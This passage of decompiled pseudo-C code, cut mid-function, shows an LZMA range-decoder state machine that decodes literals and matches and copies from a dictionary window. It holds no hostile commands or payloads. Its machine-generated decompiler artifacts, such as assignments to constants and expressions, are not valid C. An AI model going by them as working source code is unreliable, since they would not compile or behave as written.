                          												__eflags = _t532;
                          												 *_t605 = _t532;
                          											} else {
                          												 *(_t612 - 0x10) = _t564;
                          												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                          												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                          											}
                          											if( *(_t612 - 0x10) >= 0x1000000) {
                          												goto L139;
                          											} else {
                          												goto L137;
                          											}
                          										case 5:
                          											L137:
                          											if( *(_t612 - 0x6c) == 0) {
                          												 *(_t612 - 0x88) = 5;
                          												goto L170;
                          											}
                          											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                          											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                          											L139:
                          											_t533 =  *(_t612 - 0x84);
                          											goto L140;
                          										case 6:
                          											__edx = 0;
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x34) = 1;
                          												 *(__ebp - 0x84) = 7;
                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          												goto L132;
                          											}
                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          											__esi =  *(__ebp - 0x60);
                          											__cl = 8;
                          											__cl = 8 -  *(__ebp - 0x3c);
                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          											__ecx =  *(__ebp - 0x3c);
                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          											__ecx =  *(__ebp - 4);
                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          											__eflags =  *(__ebp - 0x38) - 4;
                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											if( *(__ebp - 0x38) >= 4) {
                          												__eflags =  *(__ebp - 0x38) - 0xa;
                          												if( *(__ebp - 0x38) >= 0xa) {
                          													_t98 = __ebp - 0x38;
                          													 *_t98 =  *(__ebp - 0x38) - 6;
                          													__eflags =  *_t98;
                          												} else {
                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          												}
                          											} else {
                          												 *(__ebp - 0x38) = 0;
                          											}
                          											__eflags =  *(__ebp - 0x34) - __edx;
                          											if( *(__ebp - 0x34) == __edx) {
                          												__ebx = 0;
                          												__ebx = 1;
                          												goto L61;
                          											} else {
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__ecx =  *(__ebp - 8);
                          												__ebx = 0;
                          												__ebx = 1;
                          												__al =  *((intOrPtr*)(__eax + __ecx));
                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          												goto L41;
                          											}
                          										case 7:
                          											__eflags =  *(__ebp - 0x40) - 1;
                          											if( *(__ebp - 0x40) != 1) {
                          												__eax =  *(__ebp - 0x24);
                          												 *(__ebp - 0x80) = 0x16;
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x28);
                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          												__eax =  *(__ebp - 0x2c);
                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          												__al = __al & 0x000000fd;
                          												__eax = (__eflags >= 0) - 1 + 0xa;
                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          												__eax =  *(__ebp - 4);
                          												__eax =  *(__ebp - 4) + 0x664;
                          												__eflags = __eax;
                          												 *(__ebp - 0x58) = __eax;
                          												goto L69;
                          											}
                          											__eax =  *(__ebp - 4);
                          											__ecx =  *(__ebp - 0x38);
                          											 *(__ebp - 0x84) = 8;
                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          											goto L132;
                          										case 8:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 0xa;
                          												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          											} else {
                          												__eax =  *(__ebp - 0x38);
                          												__ecx =  *(__ebp - 4);
                          												__eax =  *(__ebp - 0x38) + 0xf;
                          												 *(__ebp - 0x84) = 9;
                          												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          											}
                          											goto L132;
                          										case 9:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												goto L90;
                          											}
                          											__eflags =  *(__ebp - 0x60);
                          											if( *(__ebp - 0x60) == 0) {
                          												goto L171;
                          											}
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                          											__eflags = _t259;
                          											0 | _t259 = _t259 + _t259 + 9;
                          											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                          											goto L76;
                          										case 0xa:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 0xb;
                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          												goto L132;
                          											}
                          											__eax =  *(__ebp - 0x28);
                          											goto L89;
                          										case 0xb:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__ecx =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x20);
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          											} else {
                          												__eax =  *(__ebp - 0x24);
                          											}
                          											__ecx =  *(__ebp - 0x28);
                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          											L89:
                          											__ecx =  *(__ebp - 0x2c);
                          											 *(__ebp - 0x2c) = __eax;
                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          											L90:
                          											__eax =  *(__ebp - 4);
                          											 *(__ebp - 0x80) = 0x15;
                          											__eax =  *(__ebp - 4) + 0xa68;
                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          											goto L69;
                          										case 0xc:
                          											L100:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xc;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t335 = __ebp - 0x70;
                          											 *_t335 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t335;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											__eax =  *(__ebp - 0x2c);
                          											goto L102;
                          										case 0xd:
                          											L37:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xd;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t122 = __ebp - 0x70;
                          											 *_t122 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t122;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L39:
                          											__eax =  *(__ebp - 0x40);
                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          												goto L48;
                          											}
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												goto L54;
                          											}
                          											L41:
                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          											__ecx =  *(__ebp - 0x58);
                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          											 *(__ebp - 0x48) = __eax;
                          											__eax = __eax + 1;
                          											__eax = __eax << 8;
                          											__eax = __eax + __ebx;
                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edx = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												 *(__ebp - 0x40) = 1;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												__ebx = __ebx + __ebx + 1;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edx;
                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L39;
                          											} else {
                          												goto L37;
                          											}
                          										case 0xe:
                          											L46:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xe;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t156 = __ebp - 0x70;
                          											 *_t156 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t156;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											while(1) {
                          												L48:
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													break;
                          												}
                          												__eax =  *(__ebp - 0x58);
                          												__edx = __ebx + __ebx;
                          												__ecx =  *(__ebp - 0x10);
                          												__esi = __edx + __eax;
                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													_t170 = __edx + 1; // 0x1
                          													__ebx = _t170;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													continue;
                          												} else {
                          													goto L46;
                          												}
                          											}
                          											L54:
                          											_t173 = __ebp - 0x34;
                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          											__eflags =  *_t173;
                          											goto L55;
                          										case 0xf:
                          											L58:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xf;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t203 = __ebp - 0x70;
                          											 *_t203 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t203;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L60:
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												L55:
                          												__al =  *(__ebp - 0x44);
                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          												goto L56;
                          											}
                          											L61:
                          											__eax =  *(__ebp - 0x58);
                          											__edx = __ebx + __ebx;
                          											__ecx =  *(__ebp - 0x10);
                          											__esi = __edx + __eax;
                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edi = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												_t217 = __edx + 1; // 0x1
                          												__ebx = _t217;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edi;
                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L60;
                          											} else {
                          												goto L58;
                          											}
                          										case 0x10:
                          											L110:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0x10;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t366 = __ebp - 0x70;
                          											 *_t366 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t366;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											goto L112;
                          										case 0x11:
                          											L69:
                          											__esi =  *(__ebp - 0x58);
                          											 *(__ebp - 0x84) = 0x12;
                          											L132:
                          											 *(_t612 - 0x54) = _t605;
                          											goto L133;
                          										case 0x12:
                          											goto L0;
                          										case 0x13:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												_t469 = __ebp - 0x58;
                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                          												__eflags =  *_t469;
                          												 *(__ebp - 0x30) = 0x10;
                          												 *(__ebp - 0x40) = 8;
                          												goto L144;
                          											}
                          											__eax =  *(__ebp - 0x4c);
                          											__ecx =  *(__ebp - 0x58);
                          											__eax =  *(__ebp - 0x4c) << 4;
                          											 *(__ebp - 0x30) = 8;
                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          											goto L130;
                          										case 0x14:
                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          											__eax =  *(__ebp - 0x80);
                          											L140:
                          											 *(_t612 - 0x88) = _t533;
                          											goto L1;
                          										case 0x15:
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          											__al = __al & 0x000000fd;
                          											__eax = (__eflags >= 0) - 1 + 0xb;
                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          											goto L121;
                          										case 0x16:
                          											__eax =  *(__ebp - 0x30);
                          											__eflags = __eax - 4;
                          											if(__eax >= 4) {
                          												_push(3);
                          												_pop(__eax);
                          											}
                          											__ecx =  *(__ebp - 4);
                          											 *(__ebp - 0x40) = 6;
                          											__eax = __eax << 7;
                          											 *(__ebp - 0x7c) = 0x19;
                          											 *(__ebp - 0x58) = __eax;
                          											goto L145;
                          										case 0x17:
                          											goto L145;
                          										case 0x18:
                          											L146:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0x18;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t484 = __ebp - 0x70;
                          											 *_t484 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t484;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L148:
                          											_t487 = __ebp - 0x48;
                          											 *_t487 =  *(__ebp - 0x48) - 1;
                          											__eflags =  *_t487;
                          											goto L149;
                          										case 0x19:
                          											__eflags = __ebx - 4;
                          											if(__ebx < 4) {
                          												 *(__ebp - 0x2c) = __ebx;
                          												L120:
                          												_t394 = __ebp - 0x2c;
                          												 *_t394 =  *(__ebp - 0x2c) + 1;
                          												__eflags =  *_t394;
                          												L121:
                          												__eax =  *(__ebp - 0x2c);
                          												__eflags = __eax;
                          												if(__eax == 0) {
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          													goto L170;
                          												}
                          												__eflags = __eax -  *(__ebp - 0x60);
                          												if(__eax >  *(__ebp - 0x60)) {
                          													goto L171;
                          												}
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          												__eax =  *(__ebp - 0x30);
                          												_t401 = __ebp - 0x60;
                          												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          												__eflags =  *_t401;
                          												goto L124;
                          											}
                          											__ecx = __ebx;
                          											__eax = __ebx;
                          											__ecx = __ebx >> 1;
                          											__eax = __ebx & 0x00000001;
                          											__ecx = (__ebx >> 1) - 1;
                          											__al = __al | 0x00000002;
                          											__eax = (__ebx & 0x00000001) << __cl;
                          											__eflags = __ebx - 0xe;
                          											 *(__ebp - 0x2c) = __eax;
                          											if(__ebx >= 0xe) {
                          												__ebx = 0;
                          												 *(__ebp - 0x48) = __ecx;
                          												L103:
                          												__eflags =  *(__ebp - 0x48);
                          												if( *(__ebp - 0x48) <= 0) {
                          													__eax = __eax + __ebx;
                          													 *(__ebp - 0x40) = 4;
                          													 *(__ebp - 0x2c) = __eax;
                          													__eax =  *(__ebp - 4);
                          													__eax =  *(__ebp - 4) + 0x644;
                          													__eflags = __eax;
                          													L109:
                          													__ebx = 0;
                          													 *(__ebp - 0x58) = __eax;
                          													 *(__ebp - 0x50) = 1;
                          													 *(__ebp - 0x44) = 0;
                          													 *(__ebp - 0x48) = 0;
                          													L113:
                          													__eax =  *(__ebp - 0x40);
                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          														_t392 = __ebp - 0x2c;
                          														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                          														__eflags =  *_t392;
                          														goto L120;
                          													}
                          													__eax =  *(__ebp - 0x50);
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          													__eax =  *(__ebp - 0x58);
                          													__esi = __edi + __eax;
                          													 *(__ebp - 0x54) = __esi;
                          													__ax =  *__esi;
                          													__ecx = __ax & 0x0000ffff;
                          													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          													__eflags =  *(__ebp - 0xc) - __edx;
                          													if( *(__ebp - 0xc) >= __edx) {
                          														__ecx = 0;
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          														__ecx = 1;
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          														__ebx = 1;
                          														__ecx =  *(__ebp - 0x48);
                          														__ebx = 1 << __cl;
                          														__ecx = 1 << __cl;
                          														__ebx =  *(__ebp - 0x44);
                          														__ebx =  *(__ebp - 0x44) | __ecx;
                          														__cx = __ax;
                          														__cx = __ax >> 5;
                          														__eax = __eax - __ecx;
                          														__edi = __edi + 1;
                          														__eflags = __edi;
                          														 *(__ebp - 0x44) = __ebx;
                          														 *__esi = __ax;
                          														 *(__ebp - 0x50) = __edi;
                          													} else {
                          														 *(__ebp - 0x10) = __edx;
                          														0x800 = 0x800 - __ecx;
                          														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          														 *__esi = __dx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														L112:
                          														_t369 = __ebp - 0x48;
                          														 *_t369 =  *(__ebp - 0x48) + 1;
                          														__eflags =  *_t369;
                          														goto L113;
                          													} else {
                          														goto L110;
                          													}
                          												}
                          												__ecx =  *(__ebp - 0xc);
                          												__ebx = __ebx + __ebx;
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          													__ecx =  *(__ebp - 0x10);
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          													__ebx = __ebx | 0x00000001;
                          													__eflags = __ebx;
                          													 *(__ebp - 0x44) = __ebx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													L102:
                          													_t339 = __ebp - 0x48;
                          													 *_t339 =  *(__ebp - 0x48) - 1;
                          													__eflags =  *_t339;
                          													goto L103;
                          												} else {
                          													goto L100;
                          												}
                          											}
                          											__edx =  *(__ebp - 4);
                          											__eax = __eax - __ebx;
                          											 *(__ebp - 0x40) = __ecx;
                          											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          											goto L109;
                          										case 0x1a:
                          											L56:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												 *(__ebp - 0x88) = 0x1a;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x68);
                          											__al =  *(__ebp - 0x5c);
                          											__edx =  *(__ebp - 8);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          											 *( *(__ebp - 0x68)) = __al;
                          											__ecx =  *(__ebp - 0x14);
                          											 *(__ecx +  *(__ebp - 8)) = __al;
                          											__eax = __ecx + 1;
                          											__edx = 0;
                          											_t192 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t192;
                          											goto L80;
                          										case 0x1b:
                          											L76:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												 *(__ebp - 0x88) = 0x1b;
                          												goto L170;
                          											}
                          											__eax =  *(__ebp - 0x14);
                          											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          											__eflags = __eax -  *(__ebp - 0x74);
                          											if(__eax >=  *(__ebp - 0x74)) {
                          												__eax = __eax +  *(__ebp - 0x74);
                          												__eflags = __eax;
                          											}
                          											__edx =  *(__ebp - 8);
                          											__cl =  *(__eax + __edx);
                          											__eax =  *(__ebp - 0x14);
                          											 *(__ebp - 0x5c) = __cl;
                          											 *(__eax + __edx) = __cl;
                          											__eax = __eax + 1;
                          											__edx = 0;
                          											_t275 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t275;
                          											__eax =  *(__ebp - 0x68);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											_t284 = __ebp - 0x64;
                          											 *_t284 =  *(__ebp - 0x64) - 1;
                          											__eflags =  *_t284;
                          											 *( *(__ebp - 0x68)) = __cl;
                          											L80:
                          											 *(__ebp - 0x14) = __edx;
                          											goto L81;
                          										case 0x1c:
                          											while(1) {
                          												L124:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													break;
                          												}
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__edx =  *(__ebp - 8);
                          												__cl =  *(__eax + __edx);
                          												__eax =  *(__ebp - 0x14);
                          												 *(__ebp - 0x5c) = __cl;
                          												 *(__eax + __edx) = __cl;
                          												__eax = __eax + 1;
                          												__edx = 0;
                          												_t415 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t415;
                          												__eax =  *(__ebp - 0x68);
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          												__eflags =  *(__ebp - 0x30);
                          												 *( *(__ebp - 0x68)) = __cl;
                          												 *(__ebp - 0x14) = _t415;
                          												if( *(__ebp - 0x30) > 0) {
                          													continue;
                          												} else {
                          													L81:
                          													 *(__ebp - 0x88) = 2;
                          													goto L1;
                          												}
                          											}
                          											 *(__ebp - 0x88) = 0x1c;
                          											L170:
                          											_push(0x22);
                          											_pop(_t567);
                          											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                          											_t535 = 0;
